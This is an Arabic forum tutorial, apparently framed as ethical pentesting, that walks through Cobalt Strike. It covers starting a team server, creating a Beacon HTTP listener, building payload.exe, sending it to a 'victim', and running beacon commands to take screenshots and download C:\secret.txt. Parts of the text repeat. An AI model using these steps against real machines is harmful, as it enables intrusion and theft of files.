
x32x01
أدارة أكتب كود
- بواسطة x32x01 ||
هي أداة متقدمة تستخدم في أختبار الأختراق (Penetration Testing) ومحاكاة الهجمات السيبرانية تعتبر من الأدوات القوية التي تتيح لمختبرين الاختراق محاكاة تهديدات حقيقية لتقييم أمان الأنظمة والشبكات.
التحكم عن بعد (Command and Control)
استغلال الثغرات (Exploitation)
جمع المعلومات (Reconnaissance)
التخفي (Evasion Techniques)
التفاعل مع الفريق (Team Collaboration)
مثال:
لنفترض أنك مختبر اختراق أخلاقي وتريد اختبار أمان شبكة شركة ما، تريد معرفة ما إذا كان بإمكانك الوصول إلى أنظمة الشركة عن طريق استغلال ثغرة في أحد التطبيقات.
قم بتشغيل Cobalt Strike Team Server على جهازك.
قم بتشغيل Cobalt Strike Client للاتصال بالخادم.
في واجهة Cobalt Strike، انتقل إلى Cobalt Strike بعدها Listeners.
انقر على Add لإنشاء Listener جديد.
اختر نوع Listener، مثل Beacon HTTP.
انتقل إلى Attacks > Packages > Windows Executable (S).
اختر Listener الذي أنشأته مسبقًا.
قم بحفظ الملف التنفيذي (مثل payload.exe).
قم بإرسال الملف إلى الضحية.
عندما يتم تنفيذ الملف على جهاز الضحية، سيتم إنشاء جلسة Beacon في Cobalt Strike، يمكنك التحكم في الجهاز المخترق باستخدام أوامر.
مثال تطبيقي:
انتقل إلى Cobalt Strike > Listeners، ثم أضف Listener من نوع Beacon HTTP.
انتقل إلى Attacks > Packages > Windows Executable (S).
اختر Listener الذي أنشأته.
قم بحفظ الملف ك payload.exe.
قم بإرسال payload.exe إلى الضحية.
عند تنفيذ payload.exe على جهاز الضحية، ستظهر جلسة Beacon في Cobalt Strike.
استخدم الأوامر للتحكم في الجهاز:
توفر مجموعة واسعة من الميزات، بما في ذلك:






لنفترض أنك مختبر اختراق أخلاقي وتريد اختبار أمان شبكة شركة ما، تريد معرفة ما إذا كان بإمكانك الوصول إلى أنظمة الشركة عن طريق استغلال ثغرة في أحد التطبيقات.
تجهيز البيئة:
قم بتشغيل Cobalt Strike Team Server على جهازك.قم بتشغيل Cobalt Strike Client للاتصال بالخادم.
إنشاء Listener:
في واجهة Cobalt Strike، انتقل إلى Cobalt Strike بعدها Listeners.انقر على Add لإنشاء Listener جديد.
اختر نوع Listener، مثل Beacon HTTP.
إنشاء Payload:
انتقل إلى Attacks > Packages > Windows Executable (S).اختر Listener الذي أنشأته مسبقًا.
قم بحفظ الملف التنفيذي (مثل payload.exe).
إرسال Payload:
قم بإرسال الملف إلى الضحية.
التحكم في الجهاز المخترق:
عندما يتم تنفيذ الملف على جهاز الضحية، سيتم إنشاء جلسة Beacon في Cobalt Strike، يمكنك التحكم في الجهاز المخترق باستخدام أوامر.
تشغيل Team Server:
Code:
./teamserver 192.168.1.100 MySecurePassword
تشغيل Cobalt Strike Client:
Code:
./cobaltstrike
إنشاء Listener:
انتقل إلى Cobalt Strike > Listeners، ثم أضف Listener من نوع Beacon HTTP.
إنشاء Payload:
انتقل إلى Attacks > Packages > Windows Executable (S).اختر Listener الذي أنشأته.
قم بحفظ الملف ك payload.exe.
إرسال Payload:
قم بإرسال payload.exe إلى الضحية.
التحكم في الجهاز:
عند تنفيذ payload.exe على جهاز الضحية، ستظهر جلسة Beacon في Cobalt Strike.استخدم الأوامر للتحكم في الجهاز:
Code:
beacon> shell whoami
beacon> download C:\secret.txt
beacon> screenshot